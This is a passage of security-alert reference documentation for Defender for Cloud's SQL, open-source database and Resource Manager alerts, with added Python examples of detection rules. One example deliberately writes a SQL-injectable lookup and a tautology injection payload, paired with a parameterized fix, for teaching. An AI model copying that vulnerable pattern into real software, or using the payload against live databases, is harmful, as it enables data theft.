Severity: Medium

Login from a suspicious IP (SQL.DB_SuspiciousIpAnomaly, SQL.VM_SuspiciousIpAnomaly, SQL.DW_SuspiciousIpAnomaly, SQL.MI_SuspiciousIpAnomaly, Synapse.SQLPool_SuspiciousIpAnomaly)
Description: Your resource has been accessed successfully from an IP address that Microsoft Threat Intelligence has associated with suspicious activity.
MITRE tactics: PreAttack
Severity: Medium

Potential SQL injection (SQL.DB_PotentialSqlInjection, SQL.VM_PotentialSqlInjection, SQL.MI_PotentialSqlInjection, SQL.DW_PotentialSqlInjection, Synapse.SQLPool_PotentialSqlInjection)
Description: An active exploit has occurred against an identified application vulnerable to SQL injection. This means an attacker is trying to inject malicious SQL statements by using the vulnerable application code or stored procedures.
MITRE tactics: PreAttack
Severity: High

Suspected brute force attack using a valid user (SQL.DB_BruteForce, SQL.VM_BruteForce, SQL.DW_BruteForce, SQL.MI_BruteForce, Synapse.SQLPool_BruteForce)
Description: A potential brute force attack has been detected on your resource. The attacker is using a valid user (username), which has permissions to log in.
MITRE tactics: PreAttack
Severity: High

Suspected brute force attack (SQL.DB_BruteForce, SQL.VM_BruteForce, SQL.DW_BruteForce, SQL.MI_BruteForce, Synapse.SQLPool_BruteForce)
Description: A potential brute force attack has been detected on your resource.
MITRE tactics: PreAttack
Severity: High
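The "possible vulnerability to SQL injection" alert fires on faulty statements, and "potential SQL injection" on the exploit that follows. The added example below (not code from this page or from Microsoft) shows the application-side defect that produces both signals and its parameterized fix, using an in-memory SQLite database with constructed rows; the table, the user names and the probe inputs are assumptions, and SQLite's error text differs from SQL Server's, but the mechanism is the same.

```python
"""Added example: the code defect behind the SQL-injection alerts above and its fix.
Runs against an in-memory SQLite database with constructed data; not Defender code."""
import sqlite3


def make_db():
    """Constructed sample table with two users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [("alice", "admin"), ("bob", "user")])
    return conn


def lookup_vulnerable(conn, name):
    """String concatenation: the input becomes part of the SQL grammar, so a stray
    quote produces a faulty statement and a crafted quote changes the WHERE clause."""
    sql = f"SELECT role FROM users WHERE name = '{name}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, name):
    """Bound parameter: the input is data only and is never parsed as SQL."""
    return [row[0] for row in conn.execute("SELECT role FROM users WHERE name = ?", (name,))]


def probe(func, conn, name):
    """Run one lookup and report ('ok', rows) or ('faulty', error_text).
    A faulty statement is exactly what the 'possible vulnerability' alert counts."""
    try:
        return ("ok", func(conn, name))
    except sqlite3.OperationalError as exc:
        return ("faulty", str(exc))


def count_faulty(conn, func, inputs):
    """Number of inputs that make func emit a statement the database cannot parse."""
    return sum(1 for name in inputs if probe(func, conn, name)[0] == "faulty")


# Constructed inputs: a normal name, a benign name with an apostrophe (a code defect,
# the first cause the alert lists), an attacker's quote probe, and a tautology payload.
PROBES = ["bob", "O'Brien", "bob'", "x' OR '1'='1"]

if __name__ == "__main__":
    db = make_db()
    for name in PROBES:
        print(f"{name!r:18} vulnerable={probe(lookup_vulnerable, db, name)}  "
              f"parameterized={probe(lookup_parameterized, db, name)}")
```

Run standalone, the vulnerable lookup fails on both `O'Brien` and `bob'` (the faulty-statement signal) and returns every role for the tautology payload (the exploit signal), while the parameterized lookup simply finds no user with those literal names.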


Suspected successful brute force attack (SQL.DB_BruteForce, SQL.VM_BruteForce, SQL.DW_BruteForce, SQL.MI_BruteForce, Synapse.SQLPool_BruteForce)
Description: A successful login occurred after an apparent brute force attack on your resource.
MITRE tactics: PreAttack
Severity: High

SQL Server potentially spawned a Windows command shell and accessed an abnormal external source (SQL.DB_ShellExternalSourceAnomaly, SQL.VM_ShellExternalSourceAnomaly, SQL.DW_ShellExternalSourceAnomaly, SQL.MI_ShellExternalSourceAnomaly, Synapse.SQLPool_ShellExternalSourceAnomaly)
Description: A suspicious SQL statement potentially spawned a Windows command shell with an external source that hasn't been seen before. Executing a shell that accesses an external source is a method used by attackers to download a malicious payload and then execute it on the machine and compromise it. This enables an attacker to perform malicious tasks under remote direction. Alternatively, accessing an external source can be used to exfiltrate data to an external destination.
MITRE tactics: Execution
Severity: High

Unusual payload with obfuscated parts has been initiated by SQL Server (SQL.VM_PotentialSqlInjection)
Description: Someone has initiated a new payload utilizing the layer in SQL Server that communicates with the operating system while concealing the command in the SQL query. Attackers commonly hide impactful commands which are widely monitored, like xp_cmdshell, sp_add_job and others. Obfuscation techniques abuse legitimate constructs like string concatenation, casting, base changing, and others, to avoid regex detection and hurt the readability of the logs.
MITRE tactics: Execution
Severity: High


Alerts for open-source relational databases


Further details and notes


Alert (alert type) | Description | MITRE tactics (Learn more) | Severity

Suspected brute force attack using a valid user (SQL.PostgreSQL_BruteForce, SQL.MariaDB_BruteForce, SQL.MySQL_BruteForce)
Description: A potential brute force attack has been detected on your resource. The attacker is using a valid user (username), which has permissions to log in.
MITRE tactics: PreAttack
Severity: High

Suspected successful brute force attack (SQL.PostgreSQL_BruteForce, SQL.MySQL_BruteForce, SQL.MariaDB_BruteForce)
Description: A successful login occurred after an apparent brute force attack on your resource.
MITRE tactics: PreAttack
Severity: High

Suspected brute force attack (SQL.PostgreSQL_BruteForce, SQL.MySQL_BruteForce, SQL.MariaDB_BruteForce)
Description: A potential brute force attack has been detected on your resource.
MITRE tactics: PreAttack
Severity: High

Attempted logon by a potentially harmful application (SQL.PostgreSQL_HarmfulApplication, SQL.MariaDB_HarmfulApplication, SQL.MySQL_HarmfulApplication)
Description: A potentially harmful application attempted to access your resource.
MITRE tactics: PreAttack
Severity: High
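The three brute-force alerts (for SQL Database and Synapse above, and for the open-source databases here) differ only in what is known about the failed attempts: whether they targeted an existing login, and whether a success followed. The added example below (not this page's or Microsoft's code) rebuilds that distinction as a sliding-window rule over constructed login events; the 10-minute window, the threshold of 20 failures, the known-user list, and the IP addresses and timestamps are all assumptions.

```python
"""Added example: sliding-window classification for the three brute-force alert
variants. Thresholds, users and events are constructed; not Defender's logic."""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)  # assumed
FAILURE_THRESHOLD = 20          # assumed

VALID_USER = "Suspected brute force attack using a valid user"
PLAIN = "Suspected brute force attack"
SUCCESSFUL = "Suspected successful brute force attack"


def classify_brute_force(events, known_users):
    """events: (iso_time, source_ip, username, success) tuples.
    Returns {source_ip: alert_name} for every IP whose failures reach
    FAILURE_THRESHOLD inside WINDOW; a later success from that IP escalates
    the verdict to SUCCESSFUL."""
    by_ip = defaultdict(list)
    for t, ip, user, ok in events:
        by_ip[ip].append((datetime.fromisoformat(t), user, ok))
    verdicts = {}
    for ip, rows in by_ip.items():
        rows.sort()
        failures, burst = [], False  # failures inside the current window
        for when, user, ok in rows:
            if ok:
                if burst:
                    verdicts[ip] = SUCCESSFUL
                continue
            failures.append((when, user))
            failures = [f for f in failures if when - f[0] <= WINDOW]
            if len(failures) >= FAILURE_THRESHOLD and not burst:
                burst = True
                all_valid = all(u in known_users for _, u in failures)
                verdicts[ip] = VALID_USER if all_valid else PLAIN
    return verdicts


def _burst(ip, users, start, n, success_after):
    """Constructed event generator: n failures 10 s apart, optionally then one success."""
    base = datetime.fromisoformat(start)
    evs = [((base + timedelta(seconds=10 * i)).isoformat(), ip, users[i % len(users)], False)
           for i in range(n)]
    if success_after:
        evs.append(((base + timedelta(seconds=10 * n + 30)).isoformat(), ip, users[0], True))
    return evs


KNOWN_USERS = {"sa", "app_reader", "bob"}  # constructed login list
SAMPLE_EVENTS = (
    _burst("198.51.100.7", ["sa"], "2023-05-01T02:00:00", 25, True)                  # valid user, then success
    + _burst("198.51.100.8", [f"admin{i}" for i in range(25)], "2023-05-01T02:10:00", 25, False)  # guessed names
    + _burst("203.0.113.5", ["bob"], "2023-05-01T08:00:00", 3, True)                 # ordinary typo, no alert
)

if __name__ == "__main__":
    for ip, verdict in classify_brute_force(SAMPLE_EVENTS, KNOWN_USERS).items():
        print(f"{ip:<14} {verdict}")
```

The "successful" verdict is the one to treat as an incident rather than noise: the page rates all three High, but only the third means the attacker now holds working credentials.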


Login from a principal user not seen in 60 days (SQL.PostgreSQL_PrincipalAnomaly, SQL.MariaDB_PrincipalAnomaly, SQL.MySQL_PrincipalAnomaly)
Description: A principal user not seen in the last 60 days has logged into your database. If this database is new or this is expected behavior caused by recent changes in the users accessing the database, Defender for Cloud will identify significant changes to the access patterns and attempt to prevent future false positives.
MITRE tactics: Exploitation
Severity: Medium

Login from a domain not seen in 60 days (SQL.MariaDB_DomainAnomaly, SQL.PostgreSQL_DomainAnomaly, SQL.MySQL_DomainAnomaly)
Description: A user has logged in to your resource from a domain no other users have connected from in the last 60 days. If this resource is new or this is expected behavior caused by recent changes in the users accessing the resource, Defender for Cloud will identify significant changes to the access patterns and attempt to prevent future false positives.
MITRE tactics: Exploitation
Severity: Medium

Log on from an unusual Azure Data Center (SQL.PostgreSQL_DataCenterAnomaly, SQL.MariaDB_DataCenterAnomaly, SQL.MySQL_DataCenterAnomaly)
Description: Someone logged on to your resource from an unusual Azure Data Center.
MITRE tactics: Probing
Severity: Low

Logon from an unusual cloud provider (SQL.PostgreSQL_CloudProviderAnomaly, SQL.MariaDB_CloudProviderAnomaly, SQL.MySQL_CloudProviderAnomaly)
Description: Someone logged on to your resource from a cloud provider not seen in the last 60 days. It's quick and easy for threat actors to obtain disposable compute power for use in their campaigns. If this is expected behavior caused by the recent adoption of a new cloud provider, Defender for Cloud will learn over time and attempt to prevent future false positives.
MITRE tactics: Exploitation
Severity: Medium

Log on from an unusual location (SQL.MariaDB_GeoAnomaly, SQL.PostgreSQL_GeoAnomaly, SQL.MySQL_GeoAnomaly)
Description: Someone logged on to your resource from an unusual location.
MITRE tactics: Exploitation
Severity: Medium

Login from a suspicious IP (SQL.PostgreSQL_SuspiciousIpAnomaly, SQL.MariaDB_SuspiciousIpAnomaly, SQL.MySQL_SuspiciousIpAnomaly)
Description: Your resource has been accessed successfully from an IP address that Microsoft Threat Intelligence has associated with suspicious activity.
MITRE tactics: PreAttack
Severity: Medium


Alerts for Resource Manager


Note

Alerts with a delegated access indication are triggered due to activity of third-party service providers. Learn more about service providers' activity indications.


Further details and notes 


Alert (alert type) | Description | MITRE tactics (Learn more) | Severity

Azure Resource Manager operation from suspicious IP address (ARM_OperationFromSuspiciousIP)
Description: Microsoft Defender for Resource Manager detected an operation from an IP address that has been marked as suspicious in threat intelligence feeds.
MITRE tactics: Execution
Severity: Medium

Azure Resource Manager operation from suspicious proxy IP address (ARM_OperationFromSuspiciousProxyIP)
Description: Microsoft Defender for Resource Manager detected a resource management operation from an IP address that is associated with proxy services, such as TOR. While this behavior can be legitimate, it's often seen in malicious activities, when threat actors try to hide their source IP.
MITRE tactics: Defense Evasion
Severity: Medium

MicroBurst exploitation toolkit used to enumerate resources in your subscriptions (ARM_MicroBurst.AzDomainInfo)
Description: A PowerShell script was run in your subscription and performed a suspicious pattern of executing information-gathering operations to discover resources, permissions, and network structures. Threat actors use automated scripts, like MicroBurst, to gather information for malicious activities. This was detected by analyzing Azure Resource Manager operations in your subscription. This operation might indicate that an identity in your organization was breached, and that the threat actor is trying to compromise your environment for malicious intentions.
MITRE tactics: -
Severity: Low

MicroBurst exploitation toolkit used to enumerate resources in your subscriptions (ARM_MicroBurst.AzureDomainInfo)
Description: A PowerShell script was run in your subscription and performed a suspicious pattern of executing information-gathering operations to discover resources, permissions, and network structures. Threat actors use automated scripts, like MicroBurst, to gather information for malicious activities. This was detected by analyzing Azure Resource Manager operations in your subscription. This operation might indicate that an identity in your organization was breached, and that the threat actor is trying to compromise your environment for malicious intentions.
MITRE tactics: -
Severity: Low

MicroBurst exploitation toolkit used to execute code on your virtual machine (ARM_MicroBurst.AzVMBulkCMD)
Description: A PowerShell script was run in your subscription and performed a suspicious pattern of executing code on a VM or a list of VMs. Threat actors use automated scripts, like MicroBurst, to run a script on a VM for malicious activities. This was detected by analyzing Azure Resource Manager operations in your subscription. This operation might indicate that an identity in your organization was breached, and that the threat actor is trying to compromise your environment for malicious intentions.
MITRE tactics: Execution
Severity: High

MicroBurst exploitation toolkit used to execute code on your virtual machine (RM_MicroBurst.AzureRMVMBulkCMD)
Description: MicroBurst's exploitation toolkit was used to execute code on your virtual machines. This was detected by analyzing Azure Resource Manager operations in your subscription.
MITRE tactics: -
Severity: High


MicroBurst exploitation toolkit used to extract keys from your Azure key vaults (ARM_MicroBurst.AzKeyVaultKeysREST)
Description: A PowerShell script was run in your subscription and performed a suspicious pattern of extracting keys from one or more Azure Key Vaults. Threat actors use automated scripts, like MicroBurst, to list keys and use them to access sensitive data or perform lateral movement. This was detected by analyzing Azure Resource Manager operations in your subscription. This operation might indicate that an identity in your organization was breached, and that the threat actor is trying to compromise your environment for malicious intentions.
MITRE tactics: -
Severity: High

MicroBurst exploitation toolkit used to extract keys to your storage accounts (ARM_MicroBurst.AZStorageKeysREST)
Description: A PowerShell script was run in your subscription and performed a suspicious pattern of extracting keys to one or more Storage Accounts. Threat actors use automated scripts, like MicroBurst, to list keys and use them to access sensitive data in your Storage Accounts. This was detected by analyzing Azure Resource Manager operations in your subscription. This operation might indicate that an identity in your organization was breached, and that the threat actor is trying to compromise your environment for malicious intentions.
MITRE tactics: Collection
Severity: High

MicroBurst exploitation toolkit used to extract secrets from your Azure key vaults (ARM_MicroBurst.AzKeyVaultSecretsREST)
Description: A PowerShell script was run in your subscription and performed a suspicious pattern of extracting secrets from one or more Azure Key Vaults. Threat actors use automated scripts, like MicroBurst, to list secrets and use them to access sensitive data or perform lateral movement. This was detected by analyzing Azure Resource Manager operations in your subscription. This operation might indicate that an identity in your organization was breached, and that the threat actor is trying to compromise your environment for malicious intentions.
MITRE tactics: -
Severity: High

PowerZure exploitation toolkit used to elevate access from Azure AD to Azure (ARM_PowerZure.AzureElevatedPrivileges)
Description: PowerZure exploitation toolkit was used to elevate access from Azure AD to Azure. This was detected by analyzing Azure Resource Manager operations in your tenant.
MITRE tactics: -
Severity: High

PowerZure exploitation toolkit used to enumerate resources (ARM_PowerZure.GetAzureTargets)
Description: PowerZure exploitation toolkit was used to enumerate resources on behalf of a legitimate user account in your organization. This was detected by analyzing Azure Resource Manager operations in your subscription.
MITRE tactics: Collection
Severity: High

PowerZure exploitation toolkit used to enumerate storage containers, shares, and tables (ARM_PowerZure.ShowStorageContent)
Description: PowerZure exploitation toolkit was used to enumerate storage shares, tables, and containers. This was detected by analyzing Azure Resource Manager operations in your subscription.
MITRE tactics: -
Severity: High


PowerZure exploitation toolkit used to execute a Runbook in your subscription (ARM_PowerZure.StartRunbook)
Description: PowerZure exploitation toolkit was used to execute a Runbook. This was detected by analyzing Azure Resource Manager operations in your subscription.
MITRE tactics: -
Severity: High

PowerZure exploitation toolkit used to extract Runbooks content (ARM_PowerZure.AzureRunbookContent)
Description: PowerZure exploitation toolkit was used to extract Runbook content. This was detected by analyzing Azure Resource Manager operations in your subscription.
MITRE tactics: Collection
Severity: High

PREVIEW - Azurite toolkit run detected (ARM_Azurite)
Description: A known cloud-environment reconnaissance toolkit run has been detected in your environment. The tool Azurite can be used by an attacker (or penetration tester) to map your subscriptions' resources and identify insecure configurations.
MITRE tactics: Collection
Severity: High

PREVIEW - Suspicious creation of compute resources detected (ARM_SuspiciousComputeCreation)
Description: Microsoft Defender for Resource Manager identified a suspicious creation of compute resources in your subscription utilizing Virtual Machines or Azure Scale Sets. The identified operations are designed to allow administrators to efficiently manage their environments by deploying new resources when needed. While this activity may be legitimate, a threat actor might utilize such operations to conduct crypto mining. The activity is deemed suspicious because the compute resource scale is higher than previously observed in the subscription. This can indicate that the principal is compromised and is being used with malicious intent.
MITRE tactics: Impact
Severity: Medium

PREVIEW - Suspicious key vault recovery detected (Arm_Suspicious_Vault_Recovering)
Description: Microsoft Defender for Resource Manager detected a suspicious recovery operation for a soft-deleted key vault resource. The user recovering the resource is different from the user that deleted it. This is highly suspicious because the user rarely invokes such an operation. In addition, the user logged on without multi-factor authentication (MFA). This might indicate that the user is compromised and is attempting to discover secrets and keys to gain access to sensitive resources, or to perform lateral movement across your network.
MITRE tactics: Lateral movement
Severity: Medium/high

PREVIEW - Suspicious management session using an inactive account detected (ARM_UnusedAccountPersistence)
Description: Subscription activity logs analysis has detected suspicious behavior. A principal not in use for a long period of time is now performing actions that can secure persistence for an attacker.
MITRE tactics: Persistence
Severity: Medium


PREVIEW - Suspicious invocation of a high-risk 'Credential Access' operation by a service principal detected (ARM_AnomalousServiceOperation.CredentialAccess)
Description: Microsoft Defender for Resource Manager identified a suspicious invocation of a high-risk operation in your subscription which might indicate an attempt to access credentials. The identified operations are designed to allow administrators to efficiently manage their environments. While this activity may be legitimate, a threat actor might utilize such operations to access restricted credentials and compromise resources in your environment. This can indicate that the service principal is compromised and is being used with malicious intent.
MITRE tactics: Credential access
Severity: Medium

PREVIEW - Suspicious invocation of a high-risk 'Data Collection' operation by a service principal detected (ARM_AnomalousServiceOperation.Collection)
Description: Microsoft Defender for Resource Manager identified a suspicious invocation of a high-risk operation in your subscription which might indicate an attempt to collect data. The identified operations are designed to allow administrators to efficiently manage their environments. While this activity may be legitimate, a threat actor might utilize such operations to collect sensitive data on resources in your environment. This can indicate that the service principal is compromised and is being used with malicious intent.
MITRE tactics: Collection
Severity: Medium

PREVIEW - Suspicious invocation of a high-risk 'Defense Evasion' operation by a service principal detected (ARM_AnomalousServiceOperation.DefenseEvasion)
Description: Microsoft Defender for Resource Manager identified a suspicious invocation of a high-risk operation in your subscription which might indicate an attempt to evade defenses. The identified operations are designed to allow administrators to efficiently manage the security posture of their environments. While this activity may be legitimate, a threat actor might utilize such operations to avoid being detected while compromising resources in your environment. This can indicate that the service principal is compromised and is being used with malicious intent.
MITRE tactics: Defense Evasion
Severity: Medium

PREVIEW - Suspicious invocation of a high-risk 'Execution' operation by a service principal detected (ARM_AnomalousServiceOperation.Execution)
Description: Microsoft Defender for Resource Manager identified a suspicious invocation of a high-risk operation on a machine in your subscription which might indicate an attempt to execute code. The identified operations are designed to allow administrators to efficiently manage their environments. While this activity may be legitimate, a threat actor might utilize such operations to access restricted credentials and compromise resources in your environment. This can indicate that the service principal is compromised and is being used with malicious intent.
MITRE tactics: Execution
Severity: Medium


PREVIEW - Suspicious invocation of a high-risk 'Impact' operation by a service principal detected (ARM_AnomalousServiceOperation.Impact)
Description: Microsoft Defender for Resource Manager identified a suspicious invocation of a high-risk operation in your subscription which might indicate an attempted configuration change. The identified operations are designed to allow administrators to efficiently manage their environments. While this activity may be legitimate, a threat actor might utilize such operations to access restricted credentials and compromise resources in your environment. This can indicate that the service principal is compromised and is being used with malicious intent.
MITRE tactics: Impact
Severity: Medium

PREVIEW - Suspicious invocation of a high-risk 'Initial Access' operation by a service principal detected (ARM_AnomalousServiceOperation.InitialAccess)
Description: Microsoft Defender for Resource Manager identified a suspicious invocation of a high-risk operation in your subscription which might indicate an attempt to access restricted resources. The identified operations are designed to allow administrators to efficiently access their environments. While this activity may be legitimate, a threat actor might utilize such operations to gain initial access to restricted resources in your environment. This can indicate that the service principal is compromised and is being used with malicious intent.
MITRE tactics: Initial access
Severity: Medium

PREVIEW - Suspicious invocation of a high-risk 'Lateral Movement Access' operation by a service principal detected (ARM_AnomalousServiceOperation.LateralMovement)
Description: Microsoft Defender for Resource Manager identified a suspicious invocation of a high-risk operation in your subscription which might indicate an attempt to perform lateral movement. The identified operations are designed to allow administrators to efficiently manage their environments. While this activity may be legitimate, a threat actor might utilize such operations to compromise more resources in your environment. This can indicate that the service principal is compromised and is being used with malicious intent.
MITRE tactics: Lateral movement
Severity: Medium

PREVIEW - Suspicious invocation of a high-risk 'Persistence' operation by a service principal detected (ARM_AnomalousServiceOperation.Persistence)
Description: Microsoft Defender for Resource Manager identified a suspicious invocation of a high-risk operation in your subscription which might indicate an attempt to establish persistence. The identified operations are designed to allow administrators to efficiently manage their environments. While this activity may be legitimate, a threat actor might utilize such operations to establish persistence in your environment. This can indicate that the service principal is compromised and is being used with malicious intent.
MITRE tactics: Persistence
Severity: Medium


PREVIEW - Suspicious invocation of a high-risk 'Privilege Escalation' operation by a service principal detected (ARM_AnomalousServiceOperation.PrivilegeEscalation)
Description: Microsoft Defender for Resource Manager identified a suspicious invocation of a high-risk operation in your subscription which might indicate an attempt to escalate privileges. The identified operations are designed to allow administrators to efficiently manage their environments. While this activity may be legitimate, a threat actor might utilize such operations to escalate privileges while compromising resources in your environment. This can indicate that the service principal is compromised and is being used with malicious intent.
MITRE tactics: Privilege escalation
Severity: Medium

PREVIEW - Suspicious management session using an inactive account detected (ARM_UnusedAccountPersistence)
Description: Subscription activity logs analysis has detected suspicious behavior. A principal not in use for a long period of time is now performing actions that can secure persistence for an attacker.
MITRE tactics: Persistence
Severity: Medium

PREVIEW - Suspicious management session using PowerShell detected (ARM_UnusedAppPowershellPersistence)
Description: Subscription activity logs analysis has detected suspicious behavior. A principal that doesn't regularly use PowerShell to manage the subscription environment is now using PowerShell, and performing actions that can secure persistence for an attacker.
MITRE tactics: Persistence
Severity: Medium

PREVIEW - Suspicious management session using Azure portal detected (ARM_UnusedAppIbizaPersistence)
Description: Analysis of your subscription activity logs has detected suspicious behavior. A principal that doesn't regularly use the Azure portal (Ibiza) to manage the subscription environment (it hasn't used the Azure portal to manage this subscription, or any subscription it actively manages, for the last 45 days) is now using the Azure portal and performing actions that can secure persistence for an attacker.
MITRE tactics: Persistence
Severity: Medium

Privileged custom role created for your subscription in a suspicious way (Preview) (ARM_PrivilegedRoleDefinitionCreation)
Description: Microsoft Defender for Resource Manager detected a suspicious creation of a privileged custom role definition in your subscription. This operation might have been performed by a legitimate user in your organization. Alternatively, it might indicate that an account in your organization was breached, and that the threat actor is trying to create a privileged role to use in the future to evade detection.
MITRE tactics: Privilege Escalation, Defense Evasion
Severity: Low

Suspicious Azure role assignment detected (Preview) (ARM_AnomalousRBACRoleAssignment)
Description: Microsoft Defender for Resource Manager identified a suspicious Azure role assignment, or one performed using PIM (Privileged Identity Management), in your tenant which might indicate that an account in your organization was compromised. The identified operations are designed to allow administrators to grant principals access to Azure resources. While this activity may be legitimate, a threat actor might utilize role assignment to escalate their permissions, allowing them to advance their attack.
MITRE tactics: Lateral Movement, Defense Evasion
Severity: Low (PIM) / High
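Several of the Resource Manager alerts above are plain activity-log correlations: an account idle for a long period suddenly performing a persistence-capable operation, or a soft-deleted key vault recovered by someone other than the deleter in a session without MFA. The added example below (not this page's or Microsoft's code) rebuilds those two rules over constructed Azure Activity Log-style records. The operation names, the 45-day idle window (the page states 45 days only for the portal variant), the list of "persistence-capable" operations, the principals and the timestamps are assumptions.

```python
"""Added example: two activity-log rules from the Resource Manager table, run over
constructed records. Operation names and thresholds are assumptions; not Defender code."""
from datetime import datetime, timedelta

INACTIVE_DAYS = 45  # assumed idle window
PERSISTENCE_OPS = {  # assumed: operations that can secure persistence for an attacker
    "Microsoft.Authorization/roleAssignments/write",
    "Microsoft.Authorization/roleDefinitions/write",
    "Microsoft.Automation/automationAccounts/runbooks/write",
}
VAULT_DELETE = "Microsoft.KeyVault/vaults/delete"    # assumed operation names
VAULT_RECOVER = "Microsoft.KeyVault/vaults/recover"


def _by_time(records):
    return sorted(records, key=lambda r: datetime.fromisoformat(r["time"]))


def unused_account_persistence(records):
    """ARM_UnusedAccountPersistence-style rule: a caller whose previous activity in the
    subscription is at least INACTIVE_DAYS old performs a persistence-capable operation.
    Returns (caller, operation, idle_days) tuples."""
    last_seen, findings = {}, []
    for rec in _by_time(records):
        caller, op = rec["caller"], rec["operationName"]
        when = datetime.fromisoformat(rec["time"])
        prev = last_seen.get(caller)
        if op in PERSISTENCE_OPS and prev is not None and when - prev >= timedelta(days=INACTIVE_DAYS):
            findings.append((caller, op, (when - prev).days))
        last_seen[caller] = when
    return findings


def suspicious_vault_recovery(records):
    """Arm_Suspicious_Vault_Recovering-style rule: a soft-deleted vault is recovered by a
    principal other than the one that deleted it, in a session without MFA.
    Returns (recovering_caller, vault_resource_id, deleting_caller) tuples."""
    deleted_by, findings = {}, []
    for rec in _by_time(records):
        if rec["operationName"] == VAULT_DELETE:
            deleted_by[rec["resourceId"]] = rec["caller"]
        elif rec["operationName"] == VAULT_RECOVER:
            deleter = deleted_by.get(rec["resourceId"])
            if deleter is not None and deleter != rec["caller"] and not rec.get("mfa", False):
                findings.append((rec["caller"], rec["resourceId"], deleter))
    return findings


# Constructed records; "mfa" stands in for the MFA claim a real sign-in would carry.
SAMPLE_RECORDS = [
    {"time": "2023-01-02T09:00:00", "caller": "ops@contoso.example", "operationName": "Microsoft.Compute/virtualMachines/read", "resourceId": "/subscriptions/s1/vm1", "mfa": True},
    {"time": "2023-01-03T09:00:00", "caller": "svc-backup", "operationName": "Microsoft.Storage/storageAccounts/listKeys/action", "resourceId": "/subscriptions/s1/sa1"},
    {"time": "2023-02-10T10:00:00", "caller": "bob@contoso.example", "operationName": VAULT_DELETE, "resourceId": "/subscriptions/s1/kv2", "mfa": True},
    {"time": "2023-02-12T10:00:00", "caller": "bob@contoso.example", "operationName": VAULT_RECOVER, "resourceId": "/subscriptions/s1/kv2", "mfa": True},
    {"time": "2023-02-20T09:00:00", "caller": "ops@contoso.example", "operationName": "Microsoft.Compute/virtualMachines/read", "resourceId": "/subscriptions/s1/vm1", "mfa": True},
    {"time": "2023-02-25T10:00:00", "caller": "alice@contoso.example", "operationName": VAULT_DELETE, "resourceId": "/subscriptions/s1/kv1", "mfa": True},
    {"time": "2023-02-28T23:10:00", "caller": "mallory@contoso.example", "operationName": VAULT_RECOVER, "resourceId": "/subscriptions/s1/kv1", "mfa": False},
    {"time": "2023-03-01T10:00:00", "caller": "svc-backup", "operationName": "Microsoft.Authorization/roleAssignments/write", "resourceId": "/subscriptions/s1/roleAssignments/ra1"},
    {"time": "2023-03-01T11:00:00", "caller": "ops@contoso.example", "operationName": "Microsoft.Authorization/roleAssignments/write", "resourceId": "/subscriptions/s1/roleAssignments/ra2", "mfa": True},
]

if __name__ == "__main__":
    for caller, op, idle in unused_account_persistence(SAMPLE_RECORDS):
        print(f"inactive-account persistence: {caller} idle {idle} days, then {op}")
    for caller, vault, deleter in suspicious_vault_recovery(SAMPLE_RECORDS):
        print(f"suspicious vault recovery: {caller} recovered {vault} (deleted by {deleter}), no MFA")
```

Only `svc-backup` (idle 57 days, then a role assignment) and `mallory@contoso.example` (recovering a vault `alice@contoso.example` deleted, without MFA) are reported; `ops@contoso.example` makes the same role assignment but has been active recently, and `bob@contoso.example` recovers his own vault. Those two negatives are what keep rules like these from paging on routine administration.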


Alert (alert type): Suspicious invocation of a high-risk 'Credential Access' operation detected (Preview) (ARM_AnomalousOperation.CredentialAccess)
Description: Microsoft Defender for Resource Manager identified a suspicious invocation of a high-risk operation in your subscription which might indicate an attempt to access credentials. The identified operations are designed to allow administrators to efficiently access their environments. While this activity may be legitimate, a threat actor might utilize such operations to access restricted credentials and compromise resources in your environment. This can indicate that the account is compromised and is being used with malicious intent.
MITRE tactics: Credential Access
Severity: Medium

Alert (alert type): Suspicious invocation of a high-risk 'Data Collection' operation detected (Preview) (ARM_AnomalousOperation.Collection)
Description: Microsoft Defender for Resource Manager identified a suspicious invocation of a high-risk operation in your subscription which might indicate an attempt to collect data. The identified operations are designed to allow administrators to efficiently manage their environments. While this activity may be legitimate, a threat actor might utilize such operations to collect sensitive data on resources in your environment. This can indicate that the account is compromised and is being used with malicious intent.
MITRE tactics: Collection
Severity: Medium

Alert (alert type): Suspicious invocation of a high-risk 'Defense Evasion' operation detected (Preview) (ARM_AnomalousOperation.DefenseEvasion)
Description: Microsoft Defender for Resource Manager identified a suspicious invocation of a high-risk operation in your subscription which might indicate an attempt to evade defenses. The identified operations are designed to allow administrators to efficiently manage the security posture of their environments. While this activity may be legitimate, a threat actor might utilize such operations to avoid being detected while compromising resources in your environment. This can indicate that the account is compromised and is being used with malicious intent.
MITRE tactics: Defense Evasion
Severity: Medium

Alert (alert type): Suspicious invocation of a high-risk 'Execution' operation detected (Preview) (ARM_AnomalousOperation.Execution)
Description: Microsoft Defender for Resource Manager identified a suspicious invocation of a high-risk operation on a machine in your subscription which might indicate an attempt to execute code. The identified operations are designed to allow administrators to efficiently manage their environments. While this activity may be legitimate, a threat actor might utilize such operations to access restricted credentials and compromise resources in your environment. This can indicate that the account is compromised and is being used with malicious intent.
MITRE tactics: Execution
Severity: Medium


Alert (alert type): Suspicious invocation of a high-risk 'Impact' operation detected (Preview) (ARM_AnomalousOperation.Impact)
Description: Microsoft Defender for Resource Manager identified a suspicious invocation of a high-risk operation in your subscription which might indicate an attempted configuration change. The identified operations are designed to allow administrators to efficiently manage their environments. While this activity may be legitimate, a threat actor might utilize such operations to access restricted credentials and compromise resources in your environment. This can indicate that the account is compromised and is being used with malicious intent.
MITRE tactics: Impact
Severity: Medium

Alert (alert type): Suspicious invocation of a high-risk 'Initial Access' operation detected (Preview) (ARM_AnomalousOperation.InitialAccess)
Description: Microsoft Defender for Resource Manager identified a suspicious invocation of a high-risk operation in your subscription which might indicate an attempt to access restricted resources. The identified operations are designed to allow administrators to efficiently access their environments. While this activity may be legitimate, a threat actor might utilize such operations to gain initial access to restricted resources in your environment. This can indicate that the account is compromised and is being used with malicious intent.
MITRE tactics: Initial Access
Severity: Medium

Alert (alert type): Suspicious invocation of a high-risk 'Lateral Movement' operation detected (Preview) (ARM_AnomalousOperation.LateralMovement)
Description: Microsoft Defender for Resource Manager identified a suspicious invocation of a high-risk operation in your subscription which might indicate an attempt to perform lateral movement. The identified operations are designed to allow administrators to efficiently manage their environments. While this activity may be legitimate, a threat actor might utilize such operations to compromise more resources in your environment. This can indicate that the account is compromised and is being used with malicious intent.
MITRE tactics: Lateral Movement
